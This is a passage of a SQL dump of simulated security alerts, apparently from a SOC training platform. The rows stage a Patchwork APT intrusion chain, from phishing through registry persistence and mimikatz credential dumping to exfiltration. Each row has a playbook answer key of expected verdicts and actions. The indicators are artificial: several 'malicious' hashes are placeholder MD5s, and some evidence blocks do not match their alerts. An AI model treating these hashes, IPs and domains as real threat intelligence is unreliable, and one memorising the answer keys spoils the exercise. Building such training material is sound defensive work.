GB\\\",\\\"file_name\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"3e7a1f85b1d4f6c2e4a77f7e9a9f4c3b\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_transfer\\\",\\\"encryption_used\\\":true,\\\"alert\\\":true}\"},{\"timestamp\":\"2026-02-01T20:29:22.867Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:22:34Z\\\",\\\"event_id\\\":\\\"exfiltration_12345\\\",\\\"source_ip\\\":\\\"10.0.15.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"1.2 GB\\\",\\\"file_name\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"3e7a1f85b1d4f6c2e4a77f7e9a9f4c3b\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_transfer\\\",\\\"encryption_used\\\":true,\\\"alert\\\":true}\"},{\"timestamp\":\"2026-02-01T20:28:22.867Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:22:34Z\\\",\\\"event_id\\\":\\\"exfiltration_12345\\\",\\\"source_ip\\\":\\\"10.0.15.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"1.2 GB\\\",\\\"file_name\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"3e7a1f85b1d4f6c2e4a77f7e9a9f4c3b\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_transfer\\\",\\\"encryption_used\\\":true,\\\"alert\\\":true}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1141, 'Initial Access - Spear Phishing Campaign', 'high', 'Email Security Gateway', 'A spear phishing email was sent to a Pakistani military official with a malicious attachment, aiming to gain initial access to the network.', 'Spear Phishing', 'T1566.001', 1, 'investigating', 74, '{\"timestamp\":\"2023-10-21T11:30:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.15.20.5\",\"email_subject\":\"Urgent: New Policy Updates\",\"email_sender\":\"john.doe@maliciousdomain.com\",\"email_recipient\":\"official@military.pk\",\"attachment_name\":\"Policy_Update.docx\",\"attachment_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\",\"url\":\"http://maliciousdomain.com/download\",\"indicator_of_compromise\":true}', '2026-02-01 14:02:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known spear phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used by Patchwork APT.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"john.doe@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Email address involved in previous phishing attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Policy_Update.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"File name used in past spear phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access - Spear Phishing Campaign\",\"date\":\"2026-02-01T20:32:22.868Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1142, 'Execution - Malicious Document Opens Backdoor', 'high', 'Endpoint Detection and Response (EDR)', 'A malicious document was opened on the endpoint, which triggered the execution of a backdoor. This allows attackers remote access to the system, potentially leading to further malicious activities.', 'Malware Execution', 'T1203: Exploitation for Client Execution', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:22:30Z\",\"event_id\":\"EDR-2023-5678\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"malware_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"malicious_file\":\"Invoice_Q3_2023.docx\",\"executed_process\":\"C:\\\\Users\\\\john.doe\\\\AppData\\\\Local\\\\Temp\\\\backdoor.exe\",\"username\":\"john.doe\",\"host_name\":\"DESKTOP-1A2B3C\",\"action\":\"Malware Execution Detected\"}', '2026-02-01 14:02:29', '2026-02-23 20:06:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known command and control IP associated with APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known backdoor malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Invoice_Q3_2023.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Malicious document used to deliver the payload.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Employee account used during the attack.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1143, 'Persistence - Registry Modification', 'high', 'Registry Monitoring Tools', 'Patchwork modifies the Windows registry to maintain persistence, ensuring their backdoor remains active even after system reboots. The registry key associated with the backdoor was altered to execute a malicious binary upon system startup.', 'Persistence Mechanism', 'T1547.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-01T14:35:22Z\",\"event_id\":4624,\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.5\",\"modified_registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MaliciousApp\",\"new_value\":\"C:\\\\Windows\\\\System32\\\\maliciousapp.exe\",\"username\":\"victim_user\",\"file_hash\":\"9e107d9d372bb6826bd81d3542a419d6\",\"process_id\":1234,\"process_name\":\"regedit.exe\"}', '2026-02-01 14:02:29', '2026-02-23 20:06:42', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"9e107d9d372bb6826bd81d3542a419d6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Patchwork APT backdoor.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"regedit.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable used for persistence by Patchwork APT.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"victim_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"User Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.870Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:35:22Z\\\",\\\"event_id\\\":4624,\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.5\\\",\\\"modified_registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"new_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\maliciousapp.exe\\\",\\\"username\\\":\\\"victim_user\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\",\\\"process_id\\\":1234,\\\"process_name\\\":\\\"regedit.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.870Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:35:22Z\\\",\\\"event_id\\\":4624,\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.5\\\",\\\"modified_registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"new_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\maliciousapp.exe\\\",\\\"username\\\":\\\"victim_user\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\",\\\"process_id\\\":1234,\\\"process_name\\\":\\\"regedit.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.870Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:35:22Z\\\",\\\"event_id\\\":4624,\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.5\\\",\\\"modified_registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"new_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\maliciousapp.exe\\\",\\\"username\\\":\\\"victim_user\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\",\\\"process_id\\\":1234,\\\"process_name\\\":\\\"regedit.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.870Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:35:22Z\\\",\\\"event_id\\\":4624,\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.5\\\",\\\"modified_registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"new_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\maliciousapp.exe\\\",\\\"username\\\":\\\"victim_user\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\",\\\"process_id\\\":1234,\\\"process_name\\\":\\\"regedit.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.870Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:35:22Z\\\",\\\"event_id\\\":4624,\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.5\\\",\\\"modified_registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"new_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\maliciousapp.exe\\\",\\\"username\\\":\\\"victim_user\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\",\\\"process_id\\\":1234,\\\"process_name\\\":\\\"regedit.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1144, 'Lateral Movement - Credential Dumping', 'high', 'Network Traffic Analysis', 'Detected credential dumping activity associated with Patchwork APT group. The actor is attempting lateral movement using harvested credentials to access sensitive areas of the network.', 'Credential Access', 'T1003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-22T14:32:55Z\",\"event_id\":\"123456789\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.2.3\",\"username\":\"jdoe\",\"executed_command\":\"mimikatz.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"destination_hostname\":\"sensitive-server.internal\",\"network_protocol\":\"SMB\",\"alert_info\":\"Credential dumping detected using mimikatz.exe by Patchwork APT group.\"}', '2026-02-01 14:02:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with Patchwork APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.2.3\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of sensitive server.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"mimikatz.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Mimikatz is a known credential dumping tool.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious version of mimikatz.exe.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Valid internal user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1145, 'Exfiltration - Data Compression and Exfil', 'high', 'Data Loss Prevention (DLP) Systems', 'The attackers compressed sensitive data and exfiltrated it to a remote server. The data was observed being sent from an internal IP to a suspicious external IP. The operation involved compressing files before transmission, indicating a step in a larger data exfiltration campaign targeting compromised Pakistani entities.', 'Data Exfiltration', 'T1020 - Automated Exfiltration', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T11:23:45Z\",\"source_ip\":\"10.0.15.5\",\"destination_ip\":\"203.0.113.45\",\"compressed_file\":\"sensitive_data.zip\",\"hash\":\"3a7bd3e2360a9e3d5b1e4b6c7a5e9f6c\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\",\"username\":\"jdoe\",\"file_size\":\"15MB\",\"protocol\":\"HTTPS\",\"action\":\"allowed\",\"dlp_policy_triggered\":\"Sensitive Data Exfiltration\"}', '2026-02-01 14:02:29', '2026-02-23 20:07:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.15.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the organization.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external_research\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3a7bd3e2360a9e3d5b1e4b6c7a5e9f6c\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"suspicious\",\"details\":\"File hash detected in recent APT campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"sensitive_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_dlp\",\"verdict\":\"suspicious\",\"details\":\"Filename matches pattern of sensitive data exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.872Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T11:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.15.5\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"compressed_file\\\":\\\"sensitive_data.zip\\\",\\\"hash\\\":\\\"3a7bd3e2360a9e3d5b1e4b6c7a5e9f6c\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_size\\\":\\\"15MB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"dlp_policy_triggered\\\":\\\"Sensitive Data Exfiltration\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.872Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T11:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.15.5\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"compressed_file\\\":\\\"sensitive_data.zip\\\",\\\"hash\\\":\\\"3a7bd3e2360a9e3d5b1e4b6c7a5e9f6c\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_size\\\":\\\"15MB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"dlp_policy_triggered\\\":\\\"Sensitive Data Exfiltration\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.872Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T11:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.15.5\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"compressed_file\\\":\\\"sensitive_data.zip\\\",\\\"hash\\\":\\\"3a7bd3e2360a9e3d5b1e4b6c7a5e9f6c\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_size\\\":\\\"15MB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"dlp_policy_triggered\\\":\\\"Sensitive Data Exfiltration\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.872Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T11:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.15.5\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"compressed_file\\\":\\\"sensitive_data.zip\\\",\\\"hash\\\":\\\"3a7bd3e2360a9e3d5b1e4b6c7a5e9f6c\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_size\\\":\\\"15MB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"dlp_policy_triggered\\\":\\\"Sensitive Data Exfiltration\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.872Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T11:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.15.5\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"compressed_file\\\":\\\"sensitive_data.zip\\\",\\\"hash\\\":\\\"3a7bd3e2360a9e3d5b1e4b6c7a5e9f6c\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_size\\\":\\\"15MB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"dlp_policy_triggered\\\":\\\"Sensitive Data Exfiltration\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1146, 'Spear Phishing Campaign Detected', 'high', 'Email Security Gateway Logs', 'A spear phishing email was detected targeting key personnel in military and government sectors. The email contains a malicious attachment designed to exploit unpatched vulnerabilities.', 'Initial Access', 'T1566.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T08:43:12Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.5\",\"email_subject\":\"Urgent: Security Update Required\",\"email_sender\":\"no-reply@security-update.com\",\"recipient_email\":\"john.doe@government.org\",\"attachment_name\":\"SecurityUpdate.exe\",\"attachment_hash\":\"a9f5d8c3b8f9e7d6c2a7f9d0b5e8c4a1\",\"detected\":true,\"action_taken\":\"quarantined\"}', '2026-02-07 21:12:17', '2026-02-23 20:05:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known phishing source IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of targeted user\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"no-reply@security-update.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Threat Analysis\",\"verdict\":\"malicious\",\"details\":\"Phishing sender\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"a9f5d8c3b8f9e7d6c2a7f9d0b5e8c4a1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear Phishing Campaign Detected\",\"date\":\"2026-02-08T19:00:00.275Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1147, 'Malware Execution via Exploit', 'high', 'Endpoint Detection and Response (EDR) Systems', 'Following the initial access, the attackers exploited a zero-day vulnerability to execute a custom malware named \'StealthRat\' on endpoint 192.168.1.45, gaining control over the system. The malware was executed using a payload dropped by the process svchost.exe, which connected to an external command and control server at 203.0.113.45. The hash of the malicious executable is d41d8cd98f00b204e9800998ecf8427e.', 'Execution', 'T1203: Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_id\":\"1002\",\"event_type\":\"execution\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.45\",\"process_name\":\"svchost.exe\",\"malware_name\":\"StealthRat\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"jdoe\",\"event_description\":\"Zero-day exploit used to execute custom malware\"}', '2026-02-07 21:12:17', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control 